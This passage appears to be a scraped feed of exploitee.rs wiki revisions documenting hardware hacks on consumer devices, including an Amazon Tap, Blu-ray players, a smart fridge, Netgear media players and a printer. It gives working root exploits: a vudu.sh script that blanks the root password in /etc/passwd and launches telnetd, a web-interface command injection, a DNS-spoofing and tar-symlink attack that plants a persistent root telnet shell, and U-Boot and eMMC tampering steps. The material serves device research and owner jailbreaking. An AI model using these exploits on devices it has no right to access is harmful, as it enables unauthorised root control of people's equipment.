The Amazon Tap is a wireless bluetooth &amp;amp; wifi speaker featuring the &amp;quot;Alexa&amp;quot; voice assistant.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Amazon-Tap-Portable-Wireless-Bluetooth-Speaker-with-WiFi-Alexa/dp/B01BH83OOM/ref=as_li_ss_tl?ie=UTF8&amp;amp;qid=1502096069&amp;amp;sr=8-1&amp;amp;keywords=amazon+tap&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=234a02cb2348fcb8a90c95b616f34e8b Purchase the Amazon Tap at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Hardware ==&lt;br /&gt;
* Freescale [[http://cache.nxp.com/files/32bit/doc/data_sheet/IMX6SLCEC.pdf?pspll=1 MCIMX6L8DVN10AB]] i.MX 6 SoloLite Applications Processor&lt;br /&gt;
* KMNJ2000ZM eMMC/DRAM&lt;br /&gt;
* Broadcom BCM4343&lt;br /&gt;
&lt;br /&gt;
== Teardown ==&lt;br /&gt;
You can find an excellent teardown of the Amazon Tap at [[https://www.ifixit.com/Teardown/Amazon+Tap+Teardown/61603 ifixit.com]].&lt;br /&gt;
&lt;br /&gt;
== UART ==&lt;br /&gt;
The Amazon Tap features UART pads that provides u-boot and kernel output, but allows for no practical input - no shells of any sort.&lt;br /&gt;
&lt;br /&gt;
The UART pads can be found in the photo below, with the settings of 115200 8n1.&lt;br /&gt;
&lt;br /&gt;
[[File:Amazon_Tap_UART.png|500px]]&lt;br /&gt;
&lt;br /&gt;
== Gaining Bootloader Shell ==&lt;br /&gt;
The Amazon Tap implements a secure boot process, however a bootloader shell can be obtained by grounding the eMMC flash data pin while U-Boot is reading its own environmental variables into memory.  &lt;br /&gt;
&lt;br /&gt;
To access the bootloader shell.&lt;br /&gt;
&lt;br /&gt;
# Connect to UART (keep your TX line disconnected!)&lt;br /&gt;
# Power on&lt;br /&gt;
# Wait for output over UART&lt;br /&gt;
# Ground resistor below the TP27 silkscreen&lt;br /&gt;
# U-Boot shell is available when presented with &amp;quot;=&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The photo below illustrates the process.&lt;br /&gt;
&lt;br /&gt;
[[File:Amazon Tap Flash Glitch.png|500px]]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Amazon_Tap&amp;diff=2875</id>
		<title>Amazon Tap</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Amazon_Tap&amp;diff=2875"/>
		<updated>2017-08-10T01:22:45Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Gaining Bootloader Shell */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Amazon_Tap_Stock_Photo.jpg|left|thumb|160px]]&lt;br /&gt;
[[Category:Music Players]]&lt;br /&gt;
&lt;br /&gt;
=Amazon Tap=&lt;br /&gt;
&lt;br /&gt;
The Amazon Tap is a wireless bluetooth &amp;amp; wifi speaker featuring the &amp;quot;Alexa&amp;quot; voice assistant.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Amazon-Tap-Portable-Wireless-Bluetooth-Speaker-with-WiFi-Alexa/dp/B01BH83OOM/ref=as_li_ss_tl?ie=UTF8&amp;amp;qid=1502096069&amp;amp;sr=8-1&amp;amp;keywords=amazon+tap&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=234a02cb2348fcb8a90c95b616f34e8b Purchase the Amazon Tap at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Hardware ==&lt;br /&gt;
* Freescale [[http://cache.nxp.com/files/32bit/doc/data_sheet/IMX6SLCEC.pdf?pspll=1 MCIMX6L8DVN10AB]] i.MX 6 SoloLite Applications Processor&lt;br /&gt;
* KMNJ2000ZM eMMC/DRAM&lt;br /&gt;
* Broadcom BCM4343&lt;br /&gt;
&lt;br /&gt;
== Teardown ==&lt;br /&gt;
You can find an excellent teardown of the Amazon Tap at [[https://www.ifixit.com/Teardown/Amazon+Tap+Teardown/61603 ifixit.com]].&lt;br /&gt;
&lt;br /&gt;
== UART ==&lt;br /&gt;
The Amazon Tap features UART pads that provides u-boot and kernel output, but allows for no practical input - no shells of any sort.&lt;br /&gt;
&lt;br /&gt;
The UART pads can be found in the photo below.&lt;br /&gt;
&lt;br /&gt;
[[File:Amazon_Tap_UART.png|500px]]&lt;br /&gt;
&lt;br /&gt;
== Gaining Bootloader Shell ==&lt;br /&gt;
The Amazon Tap implements a secure boot process, however a bootloader shell can be obtained by grounding the eMMC flash data pin while U-Boot is reading its own environmental variables into memory.  &lt;br /&gt;
&lt;br /&gt;
To access the bootloader shell.&lt;br /&gt;
&lt;br /&gt;
# Connect to UART (keep your TX line disconnected!)&lt;br /&gt;
# Power on&lt;br /&gt;
# Wait for output over UART&lt;br /&gt;
# Ground resistor below the TP27 silkscreen&lt;br /&gt;
# U-Boot shell is available when presented with &amp;quot;=&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The photo below illustrates the process.&lt;br /&gt;
&lt;br /&gt;
[[File:Amazon Tap Flash Glitch.png|500px]]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Amazon_Tap&amp;diff=2874</id>
		<title>Amazon Tap</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Amazon_Tap&amp;diff=2874"/>
		<updated>2017-08-10T01:21:04Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* UART */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Amazon_Tap_Stock_Photo.jpg|left|thumb|160px]]&lt;br /&gt;
[[Category:Music Players]]&lt;br /&gt;
&lt;br /&gt;
=Amazon Tap=&lt;br /&gt;
&lt;br /&gt;
The Amazon Tap is a wireless bluetooth &amp;amp; wifi speaker featuring the &amp;quot;Alexa&amp;quot; voice assistant.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Amazon-Tap-Portable-Wireless-Bluetooth-Speaker-with-WiFi-Alexa/dp/B01BH83OOM/ref=as_li_ss_tl?ie=UTF8&amp;amp;qid=1502096069&amp;amp;sr=8-1&amp;amp;keywords=amazon+tap&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=234a02cb2348fcb8a90c95b616f34e8b Purchase the Amazon Tap at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Hardware ==&lt;br /&gt;
* Freescale [[http://cache.nxp.com/files/32bit/doc/data_sheet/IMX6SLCEC.pdf?pspll=1 MCIMX6L8DVN10AB]] i.MX 6 SoloLite Applications Processor&lt;br /&gt;
* KMNJ2000ZM eMMC/DRAM&lt;br /&gt;
* Broadcom BCM4343&lt;br /&gt;
&lt;br /&gt;
== Teardown ==&lt;br /&gt;
You can find an excellent teardown of the Amazon Tap at [[https://www.ifixit.com/Teardown/Amazon+Tap+Teardown/61603 ifixit.com]].&lt;br /&gt;
&lt;br /&gt;
== UART ==&lt;br /&gt;
The Amazon Tap features UART pads that provides u-boot and kernel output, but allows for no practical input - no shells of any sort.&lt;br /&gt;
&lt;br /&gt;
The UART pads can be found in the photo below.&lt;br /&gt;
&lt;br /&gt;
[[File:Amazon_Tap_UART.png|500px]]&lt;br /&gt;
&lt;br /&gt;
== Gaining Bootloader Shell ==&lt;br /&gt;
The Amazon Tap implements a secure boot process but a bootloader shell can be obtained by grounding the flash data0 pin while u-boot is reading the kernel into memory.  &lt;br /&gt;
&lt;br /&gt;
To access the bootloader shell.&lt;br /&gt;
&lt;br /&gt;
# Connect to UART&lt;br /&gt;
# Ground resistor next to TP27 silkscreen&lt;br /&gt;
# u-boot shell is available when presented with &amp;quot;=&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The photo below illustrates the process.&lt;br /&gt;
&lt;br /&gt;
[[File:Amazon Tap Flash Glitch.png|500px]]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=LG_BP530%E2%80%8B%E2%80%8B&amp;diff=2177</id>
		<title>LG BP530​​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=LG_BP530%E2%80%8B%E2%80%8B&amp;diff=2177"/>
		<updated>2014-08-11T23:39:59Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Exploitation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:LG-BP530.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Blu-Ray Players]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the LG BP530​​ Blu-Ray player.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[http://www.amazon.com/LG-Electronics-BP530-Blu-ray-Player/dp/B00BD7UVKI?tag=gtvcom-20 Purchase the LG BP530​​ Blu-Ray Player at Amazon]&lt;br /&gt;
&lt;br /&gt;
== GPL ==&lt;br /&gt;
You can find GPL code for the [https://www.lg.com/global/support/opensource/opensourceList?types=NAME&amp;amp;search=BP530 LG BP530​​ Here]&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
A bug exists in the MTK supplied SDK which affects many Blu-Ray players, including the BP530.&lt;br /&gt;
​&lt;br /&gt;
The main binary, which controls all aspects of the player has leftover debug instructions for the VUDU app. When the VUDU app is run, if a file exists named &amp;quot;vudu.txt&amp;quot; , in a directory labeled &amp;quot;vudu&amp;quot; on a FAT formatted flash drive it will attempt to execute &amp;quot;vudu/vudu.sh&amp;quot;, and deletes vudu.txt. It runs this sh as root. Using the commands below, you can spawn a root telnet shell, allowing access to the device:&lt;br /&gt;
&lt;br /&gt;
*Create a folder named &amp;quot;vudu&amp;quot; on a FAT formatted flash drive.&lt;br /&gt;
*Inside that folder, create a blank file named &amp;quot;vudu.txt&amp;quot;&lt;br /&gt;
*Also in that folder, create a file named &amp;quot;vudu.sh&amp;quot; containing the following:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/bin/sh&lt;br /&gt;
&lt;br /&gt;
echo &amp;quot;executing&amp;quot; &amp;gt; /mnt/sda1/vudu.txt&lt;br /&gt;
mount -t overlayfs -o overlayfs /etc/passwd&lt;br /&gt;
echo &amp;quot;root::0:0:root:/root:/bin/sh&amp;quot; &amp;gt; /etc/passwd&lt;br /&gt;
&lt;br /&gt;
/mnt/rootfs_normal/usr/sbin/telnetd&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
*Start the player with the flash drive plugged in, and execute the VUDU app. The code has been executed, and a telnet shell now exists for you to connect to on port 23 as root. Following this, you will be brought back to the main menu.&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Sony_BDP-S5100&amp;diff=2175</id>
		<title>Sony BDP-S5100</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Sony_BDP-S5100&amp;diff=2175"/>
		<updated>2014-08-11T23:39:42Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Sony-bdp-s5100-multi-region-blu-ray-dvd-player.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Blu-Ray Players]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Sony BDP-S5100 Blu-Ray player .&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[http://www.amazon.com/Sony-BDP-S5100-Blu-ray-Player-Wi-Fi/dp/B00AWKC0JM?tag=gtvcom-20 Purchase the Sony BDP-S5100 Blu-Ray Player at Amazon]&lt;br /&gt;
&lt;br /&gt;
== GPL ==&lt;br /&gt;
You can find GPL code for the [http://www.sony.net/Products/Linux/Video/BDP-S1100.html Sony BDP-S5100 Here]&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
A bug exists in the MTK supplied SDK which affects many Blu-Ray players, including the BDP-S5100.&lt;br /&gt;
​&lt;br /&gt;
The main binary, which controls all aspects of the player has leftover debug instructions for the VUDU app. When the VUDU app is run, if a file exists named &amp;quot;vudu.txt&amp;quot; , in a directory labeled &amp;quot;vudu&amp;quot; on a FAT formatted flash drive it will attempt to execute &amp;quot;vudu/vudu.sh&amp;quot;, and deletes vudu.txt. It runs this sh as root. Using the commands below, you can spawn a root telnet shell, allowing access to the device:&lt;br /&gt;
&lt;br /&gt;
*Create a folder named &amp;quot;vudu&amp;quot; on a FAT formatted flash drive.&lt;br /&gt;
*Inside that folder, create a blank file named &amp;quot;vudu.txt&amp;quot;&lt;br /&gt;
*Also in that folder, create a file named &amp;quot;vudu.sh&amp;quot; containing the following:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/bin/sh&lt;br /&gt;
&lt;br /&gt;
echo &amp;quot;executing&amp;quot; &amp;gt; /mnt/sda1/vudu.txt&lt;br /&gt;
mount -t overlayfs -o overlayfs /etc/passwd&lt;br /&gt;
echo &amp;quot;root::0:0:root:/root:/bin/sh&amp;quot; &amp;gt; /etc/passwd&lt;br /&gt;
&lt;br /&gt;
/mnt/rootfs_normal/usr/sbin/telnetd&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
*Start the player with the flash drive plugged in, and execute the VUDU app. The code has been executed, and a telnet shell now exists for you to connect to on port 23 as root. Following this, you will be brought back to the main menu.&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=LG_Smart_Refrigerator_(LFX31995ST)%E2%80%8B&amp;diff=2211</id>
		<title>LG Smart Refrigerator (LFX31995ST)​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=LG_Smart_Refrigerator_(LFX31995ST)%E2%80%8B&amp;diff=2211"/>
		<updated>2014-08-11T23:34:10Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Exploitation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:LFX31995ST.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Refrigerators]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the LG Smart Refrigerator (LFX31995ST).&lt;br /&gt;
&lt;br /&gt;
== Pinouts ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
file:LG Refrigerator EMMC pinout.jpg|EMMC Pinout&lt;br /&gt;
file:LG Refrigerator UART pinout.jpg|UART Pinout&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
The LG Smart Refrigerator features two ways to gain privileges:&lt;br /&gt;
&lt;br /&gt;
1: Connecting to the UART pinout above will drop you to a root shell when booted. From here, you can connect a USB flash drive to the device, and copy a secondary launcher to the system. Use the new one, from there you can launch a root shell utilizing the built in development tools.&lt;br /&gt;
&lt;br /&gt;
2: Soldering the EMMC flash will allow you to copy a new launcher to the system partition. After rebooting the system the Android system will ask which launcher you wish to use. Use the new one, from there you can launch a root shell utilizing the built in development tools.&lt;br /&gt;
&lt;br /&gt;
EMMC refers to an Embedded Multi-Media Card​ which has native Linux support. This means it works just like an SD card, and for our purposes, just filesystem access. Error Correcting Code and Out of Bounds data, which are usually a large hassle with NAND flash memory is handled in hardware, and is transparent, which makes it easier for reading and writing.&lt;br /&gt;
&lt;br /&gt;
Although eMMC memory can have 9 Pins (VCC, VSS, CMD, CLK, DAT0-DAT4) it can also operate on SPI / Single Bit mode using only 1 DAT line.​ In short, reading/writing an eMMC chip can be done with only 5 wires, which does not require specialized hardware or software tools.&lt;br /&gt;
&lt;br /&gt;
Required Minimum Connections:​ VCC, VSS, CMD, CLK, DAT0 (These lines all normally accessible via SMD resistors​) ​ GTVHacker recommends using a device like the SD Card Sniffer from Sparkfun to interface between your SD card reader, and the flash. By adding pins to the SD Card sniffer board, it facilitates easy analysis of the correct pinout, and also reduces the risk of damage due to repeated soldering to your SD card reader.&lt;br /&gt;
&lt;br /&gt;
The LG Smart Refrigerator utilizes an EMMC flash. Using the pinouts above, you can connect the flash to a SD card reader, and rewrite it&#039;s contents.&lt;br /&gt;
&lt;br /&gt;
For the LG Smart Refrigerator device specifically, you can mount the /system partition, which is EXT4. From here, copy a stock Android 2.3 launcher into system. The Refrigerator has a built in interactive shell, under debug settings. This will allow for root access via said shell and further examination of the system internals.&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Netgear_Push2TV_(PTV3000)%E2%80%8B%E2%80%8B&amp;diff=2199</id>
		<title>Netgear Push2TV (PTV3000)​​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Netgear_Push2TV_(PTV3000)%E2%80%8B%E2%80%8B&amp;diff=2199"/>
		<updated>2014-08-11T23:29:47Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Exploitation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:NetgearPush2TV.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Media Players]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Netgear Push2TV.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[http://www.amazon.com/gp/product/B00904JILO/ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00904JILO&amp;amp;linkCode=as2&amp;amp;tag=gtvcom-20&amp;amp;linkId=TZYDPVXAW3YVMF7N Purchase the Netgear Push2TV at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Pinout ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Push2tv-uart.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
&lt;br /&gt;
There are multiple vulnerabilities in the Netgear Push2TV (PTV3000)&lt;br /&gt;
&lt;br /&gt;
* Connecting to the UART per the input above, press the spacebar while booting to interrupt the bootloader, U-Boot. From here you can execute your own bootloader commands. &amp;quot;setenv bootargs init=/bin/sh&amp;quot; will drop you to a root shell&lt;br /&gt;
* If you miss that, via UART again, a root console is active for 2-3 seconds after booting. As long as you enter your commands while it boots, they will be executed.&lt;br /&gt;
* There is also a command injection in the web interface. By inserting a command in the box nickname field (say ;reboot;) the command will be executed as root.&lt;br /&gt;
* Finally, the SPI flash chip holds the U-Boot environment, it can be reflashed to load a modified environment&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Amazon_FireTV&amp;diff=2195</id>
		<title>Amazon FireTV</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Amazon_FireTV&amp;diff=2195"/>
		<updated>2014-08-11T23:06:20Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:AmazonFireTV.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Media Players]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Amazon FireTV.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CX5P8FC/ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00CX5P8FC&amp;amp;linkCode=as2&amp;amp;tag=gtvcom-20&amp;amp;linkId=25I5UAPHAJOXM27U Purchase the FireTV at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Pinouts ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:FireTV Uart Pinout.jpg&lt;br /&gt;
File:FireTV EMMC Pinout.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
EMMC refers to an Embedded Multi-Media Card​ which has native Linux support. This means it works just like an SD card, and for our purposes, just filesystem access. Error Correcting Code and Out of Bounds data, which are usually a large hassle with NAND flash memory is handled in hardware, and is transparent, which makes it easier for reading and writing.&lt;br /&gt;
&lt;br /&gt;
Although eMMC memory can have 9 Pins (VCC, VSS, CMD, CLK, DAT0-DAT4) it can also operate on SPI / Single Bit mode using only 1 DAT line.​ In short, reading/writing an eMMC chip can be done with only 5 wires, which does not require specialized hardware or software tools.&lt;br /&gt;
&lt;br /&gt;
Required Minimum Connections:​ VCC, VSS, CMD, CLK, DAT0 (These lines all normally accessible via SMD resistors​) ​ GTVHacker recommends using a device like the SD Card Sniffer from Sparkfun to interface between your SD card reader, and the flash. By adding pins to the SD Card sniffer board, it facilitates easy analysis of the correct pinout, and also reduces the risk of damage due to repeated soldering to your SD card reader.&lt;br /&gt;
&lt;br /&gt;
The Amazon FireTV utilizes an EMMC flash. Using the pinouts above, you can connect the flash to a SD card reader, and rewrite it&#039;s contents.&lt;br /&gt;
&lt;br /&gt;
For the FireTV device specifically, you can mount the /system partition, which is EXT4. From here, just copy over the SuperSU APK into app, and the su binary to bin. Ensure that you properly chown the su binary (4755). This will allow for root access via ADB, and further examination of the system internals.&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Epson_Artisan_700/800&amp;diff=2209</id>
		<title>Epson Artisan 700/800</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Epson_Artisan_700/800&amp;diff=2209"/>
		<updated>2014-08-11T23:01:21Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:EpsonArtisan700.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Printers]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Epson Artisan 700/800 printer.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[http://www.amazon.com/gp/product/B001DJ9IAA/ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B001DJ9IAA&amp;amp;linkCode=as2&amp;amp;tag=gtvcom-20&amp;amp;linkId=MMQVXJLSRHPLTJGI Purchase the Epson Artisan 700/800 printer at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Pinouts ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Artisan700.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
&lt;br /&gt;
The Epson Artisan 700/800 series printers feature a UART shell which is accessible via the pinout above.&lt;br /&gt;
&lt;br /&gt;
By connecting to that output, you are given a menu with the following options:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&#039;r&#039; : Reboot&lt;br /&gt;
&#039;R&#039; : Reset settings and reboot.&lt;br /&gt;
&#039;a&#039; : display current IP address.&lt;br /&gt;
&#039;m&#039; : display current mac address.&lt;br /&gt;
&#039;f&#039; : show /proc/meminfo.&lt;br /&gt;
&#039;@&#039; : run shell command&lt;br /&gt;
&#039;l&#039; : List current module status&lt;br /&gt;
&#039;w&#039; : WebService status print&lt;br /&gt;
&#039;s&#039; : statussheet output&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &#039;@&#039; will allow you run commands as root on the printer.&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Netgear_NTV200-100NAS%E2%80%8B&amp;diff=2201</id>
		<title>Netgear NTV200-100NAS​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Netgear_NTV200-100NAS%E2%80%8B&amp;diff=2201"/>
		<updated>2014-08-07T02:11:00Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Exploitation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:NetgearNeoTV.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Media Players]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Netgear NTV200-100NAS​ media player.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[http://www.amazon.com/gp/product/B007YW4EQ8/ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B007YW4EQ8&amp;amp;linkCode=as2&amp;amp;tag=gtvcom-20&amp;amp;linkId=AIOKVF6HQHOWDCZI Purchase the Netgear NTV200-100NAS​ at Amazon]&lt;br /&gt;
&lt;br /&gt;
== UART Pinout ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Ntv200-uart.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
&lt;br /&gt;
After analyzing and  extracting the firmware by way of dumping the NAND flash, we discovered a flaw that allowed for code executing as root. This is a bit more complex than others, but it is still very straightforward to do.&lt;br /&gt;
&lt;br /&gt;
Any of the &amp;quot;apps&amp;quot; on the device (flash applets) are downloaded from this url: http://updates1.netgear.com (yes, it&#039;s HTTP)&lt;br /&gt;
&lt;br /&gt;
Using dnsspoof, we can spoof that url to point to a webserver that we control.&lt;br /&gt;
&lt;br /&gt;
On that webserver, create the directory structure outlined below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 /ntv200/us/game/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Since we will be using the Texas Hold&#039;em app to gain root, download and place in that folder this file: http://updates1.netgear.com/ntv200/us/game/texas.tar&lt;br /&gt;
&lt;br /&gt;
This is a two step process:&lt;br /&gt;
*Step 1&lt;br /&gt;
**Place a symlink labeled &amp;quot;hackme&amp;quot; pointing to /&lt;br /&gt;
*Step 2&lt;br /&gt;
**Drop the actual payload through the symlink&lt;br /&gt;
&lt;br /&gt;
So, we first modify texas.tar - Add a symlink of hackme to / &lt;br /&gt;
Copy that as texas.tar in the directory above, save it, and click the Texas Hold&#039;em app. It will black screen, hit home a few times. Delete the texas.tar, and replace it with the new texas.tar that is created below:&lt;br /&gt;
&lt;br /&gt;
Modify the tar, replace the symlink with a a folder structure: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/hackme/mnt/pstor/ &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Add a file in that directory called rcc.user calling telnet&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
FIX---------&lt;br /&gt;
telnetd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This file is run via bash as root and will persist at every boot. Login using the username root, no password!&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Belkin_Wemo%E2%80%8B&amp;diff=2187</id>
		<title>Belkin Wemo​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Belkin_Wemo%E2%80%8B&amp;diff=2187"/>
		<updated>2014-08-07T01:53:52Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
